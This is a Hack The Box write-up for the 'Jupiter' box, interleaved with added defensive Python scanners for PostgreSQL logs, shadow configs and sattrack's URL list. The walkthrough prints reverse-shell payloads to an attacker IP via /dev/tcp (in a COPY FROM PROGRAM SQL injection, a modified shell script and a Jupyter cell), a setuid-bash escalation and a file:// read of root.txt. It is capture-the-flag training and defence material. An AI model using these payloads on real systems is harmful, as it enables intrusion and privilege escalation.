In this walkthrough, I will go through a medium HTB box (jupiter.htb) 🙂
As usual there are two ports open: 22 and 80.
Let’s visit the site 🙂
Let's add jupiter.htb to our /etc/hosts file.
I used ffuf and found one subdomain, kiosk. Add kiosk.jupiter.htb to /etc/hosts as well.
Use Burp to visit kiosk.jupiter.htb and then check the HTTP history 🙂
Now send this request to Repeater 🙂
Change the rawSql param value to the following (the table created and the table COPY writes into must have the same name, cmd_exec):
"CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
Now your modified request will look like this 🙂
Note: don't forget to start an nc listener 🙂
And GG, you will get the revshell 🙂
Now we have a shell as the postgres user.
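Quick defender-side detour (this is an added example, not part of the original walkthrough or the box): COPY ... FROM PROGRAM only works for a superuser or a member of pg_execute_server_program, so the Grafana datasource account having that much power is the real bug here. The script below scans PostgreSQL statement-log lines (log_statement = 'all' format) for statements that reach out of the database into the OS or the filesystem. The log lines are constructed samples, and the database name appdb and the IP are placeholders.

```python
import re

# Constructed sample of PostgreSQL log lines in log_statement = 'all' style.
# These are made-up examples for the scanner, not logs captured from the box.
SAMPLE_PG_LOG = """\
2023-08-01 10:00:01 UTC [2101] grafana@appdb LOG:  statement: SELECT name FROM moons WHERE id = 3
2023-08-01 10:00:07 UTC [2101] grafana@appdb LOG:  statement: CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.X.X/4444 0>&1"'
2023-08-01 10:00:09 UTC [2101] grafana@appdb LOG:  statement: COPY moons TO '/tmp/moons.csv' CSV
2023-08-01 10:00:12 UTC [2102] app@appdb LOG:  statement: SELECT pg_read_file('/etc/passwd')
"""

# Patterns that mean a query is touching the OS or server files, not just tables.
SUSPICIOUS = [
    (re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I | re.S),
     "COPY FROM PROGRAM (OS command execution)"),
    (re.compile(r"\bCOPY\b.*\bTO\s+PROGRAM\b", re.I | re.S),
     "COPY TO PROGRAM (OS command execution)"),
    (re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+'", re.I | re.S),
     "COPY to/from a server-side file"),
    (re.compile(r"\bpg_read_(binary_)?file\s*\(", re.I),
     "pg_read_file (server file read)"),
]

# One statement-log line: timestamp, [pid], user@db, then the SQL text.
STMT = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)


def scan_pg_log(text):
    """Return one finding per suspicious statement: (line_no, user, reason, sql)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = STMT.match(line)
        if not m:
            continue  # not a statement line (errors, checkpoints, etc.)
        sql = m.group("sql")
        for pat, reason in SUSPICIOUS:
            if pat.search(sql):
                findings.append((n, m.group("user"), reason, sql))
                break  # first matching rule is enough per statement
    return findings


if __name__ == "__main__":
    for line_no, user, reason, sql in scan_pg_log(SAMPLE_PG_LOG):
        print(f"line {line_no}: {user}: {reason}: {sql[:60]}...")
```

Running this on the constructed sample flags the COPY FROM PROGRAM statement from the grafana user, the COPY to a server-side file and the pg_read_file call, and leaves the ordinary SELECT alone. On a real host the fix is to give the datasource a plain role with only SELECT on the tables it needs, and to alert on any hit from this scanner.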
In /dev/shm we can see the .yml file of juno, and we have permission to write to it 🙂
Let's upgrade the shell and edit network-simulation.yml:
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s
After this, execute /tmp/bash -p to get the shell as juno.
But we cannot read user.txt because of the uid ………………. There is, however, a shadow-simulation.sh file in the home dir. Let's add the revshell to that script.
Our updated shadow-simulation.sh will look like this:
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1
After getting the shell as juno we can read user.txt.
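The root cause of this step is a config that one user can write (it lives in /dev/shm) being consumed by a job that runs as another user. Here is an added example, not from the walkthrough or the shadow project, of what a defender would check: a small stdlib-only scanner that pulls the path/args pairs out of a shadow config and flags process entries that copy a shell or set the setuid bit, plus a permission check for the config file itself. The YAML sample is a constructed copy of the process entries above, and the rule set is my own assumption about what "risky" means.

```python
import os
import re
import stat
import tempfile

# Constructed sample: the process entries from the walkthrough's YAML, kept
# here so the scanner runs offline. Not a file read from the box.
SAMPLE_YML = """\
hosts:
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s
"""

PROCESS = re.compile(r"^\s*-\s*path:\s*(?P<path>\S+)\s*$")
ARGS = re.compile(r"^\s*args:\s*(?P<args>.*?)\s*$")

# Assumed heuristics: a simulation config has no business doing any of these.
RULES = [
    (lambda p, a: os.path.basename(p) == "chmod"
                  and re.search(r"[ugoa]*\+[rwx]*s|\b[2-7][0-7]{3}\b", a) is not None,
     "sets setuid/setgid bit"),
    (lambda p, a: os.path.basename(p) in {"cp", "install", "ln"}
                  and any(tok.endswith(("/bash", "/sh", "/dash")) for tok in a.split()),
     "copies or links a shell"),
    (lambda p, a: os.path.basename(p) in {"bash", "sh", "dash", "python3", "perl", "nc"},
     "runs an interpreter or network tool directly"),
]


def parse_processes(yaml_text):
    """Line-based extraction of (path, args) pairs from a shadow config.
    A real deployment would use a YAML parser; this keeps the example stdlib-only."""
    procs = []
    current = None
    for line in yaml_text.splitlines():
        m = PROCESS.match(line)
        if m:
            current = [m.group("path"), ""]
            procs.append(current)
            continue
        m = ARGS.match(line)
        if m and current is not None:
            current[1] = m.group("args")
    return [tuple(p) for p in procs]


def risky_processes(yaml_text):
    """Return (path, args, reason) for every process entry that trips a rule."""
    findings = []
    for path, args in parse_processes(yaml_text):
        for check, reason in RULES:
            if check(path, args):
                findings.append((path, args, reason))
                break
    return findings


def writable_by_others(path):
    """True if group or world can write the file. A job should refuse to run a
    config for which this is true, which is exactly the /dev/shm situation."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo_permission_check():
    """Create a temp file and compare a private mode with a world-writable one."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        private = writable_by_others(path)
        os.chmod(path, 0o666)
        shared = writable_by_others(path)
    finally:
        os.unlink(path)
    return private, shared


if __name__ == "__main__":
    for path, args, reason in risky_processes(SAMPLE_YML):
        print(f"{path} {args}: {reason}")
    print("private/shared writable:", demo_permission_check())
```

On the sample this reports the cp of /bin/bash and the chmod u+s. The simpler mitigation is on the job side: have the script run configs only from a directory owned by the job's user, or bail out when writable_by_others() is true.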
User – Jovian
If you check the id command you will see that juno belongs to the science group, which gives access to /opt/solar-flares/logs/. Run grep -rie token in /opt/solar-flares/logs/ to find the right Jupyter token in the logs, based on the date.
Let's use chisel to port forward 8888 and use this token.
Now let's use the token for the current date 🙂
After logging in we can execute commands from the flares.ipynb notebook. Run this in a cell:
import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"')
After executing it we will get the shell as Jovian.
Run sudo -l to check if there is some binary we can run as the root user.
Jovian can run /usr/local/bin/sattrack as root. We can get some info about this executable by using the strings tool and grepping the output to see if it reads a config file:
strings /usr/local/bin/sattrack | grep -i config
Look for it in the filesystem and copy it to /tmp:
find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp
Now, by running the sattrack executable as root, we can see that it is able to download into the working directory any file specified in a particular section of the config.json file. Let's try to exploit this feature by requesting the root.txt we want to read: edit the tlesources section and replace any of the 3 URLs with file:///root/root.txt as shown below.
"tlesources": [
    "file:///root/root.txt",
    "http://celestrak.org/NORAD/elements/n...",
    "http://celestrak.org/NORAD/elements/g..."
],
Save the new config.json and simply run sattrack as root. Enjoy the flag!
sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
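Two things went wrong in this last step: a root-run binary read its config from a user-writable location, and the download routine accepted a file:// URL. Below is an added example (my own code, not sattrack's and not from the walkthrough) showing how a fetcher would vet the tlesources list with a scheme and host allowlist, and how to decide whether a config file is trustworthy before a privileged process uses it. The JSON is a constructed stand-in for config.json, the host celestrak.example is a placeholder, and the tledir key is assumed.

```python
import json
import os
import stat
from urllib.parse import urlsplit

# Constructed config fragment shaped like sattrack's config.json.
# Hostnames are placeholders, not the box's real URLs.
SAMPLE_CONFIG = json.dumps({
    "tledir": "/tmp/tle",
    "tlesources": [
        "file:///root/root.txt",
        "http://celestrak.example/NORAD/elements/stations.txt",
        "https://celestrak.example/NORAD/elements/gps-ops.txt",
        "https://evil.example/../../etc/shadow",
    ],
})

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"celestrak.example"}  # assumed allowlist for this example


def vet_tlesources(config_text, allowed_hosts=ALLOWED_HOSTS):
    """Split tlesources into (accepted, rejected); rejected entries carry a reason.
    Only http/https to an allowlisted host is fetched, so file:// can never
    turn the downloader into a local file reader."""
    cfg = json.loads(config_text)
    accepted, rejected = [], []
    for url in cfg.get("tlesources", []):
        parts = urlsplit(url)
        if parts.scheme not in ALLOWED_SCHEMES:
            rejected.append((url, f"scheme {parts.scheme!r} not allowed"))
        elif parts.hostname not in allowed_hosts:
            rejected.append((url, f"host {parts.hostname!r} not in allowlist"))
        else:
            accepted.append(url)
    return accepted, rejected


def trusted_config(uid, mode):
    """A config consumed by a root-run binary should be root-owned and not
    writable by group or other. Anything copied to /tmp by a normal user
    fails this on the ownership check alone."""
    return uid == 0 and not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def config_file_is_trusted(path):
    """Apply trusted_config() to a real file on disk."""
    st = os.stat(path)
    return trusted_config(st.st_uid, stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    accepted, rejected = vet_tlesources(SAMPLE_CONFIG)
    print("fetch:", accepted)
    for url, reason in rejected:
        print("skip:", url, "->", reason)
    print("trusted /tmp-style config:", trusted_config(1000, 0o644))
```

With the sample config the file:// entry is dropped for its scheme and the evil.example entry for its host, leaving only the two allowlisted URLs; trusted_config(1000, 0o644) is False, which is the check that would have stopped sattrack from honouring a config sitting in /tmp in the first place.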
This box is pretty interesting and stressful at the same time; if you have a personal instance then no problem 🙂 I would rate this box 5/10.
Have a nice day!
Jay Shri Krishna ❤️❤️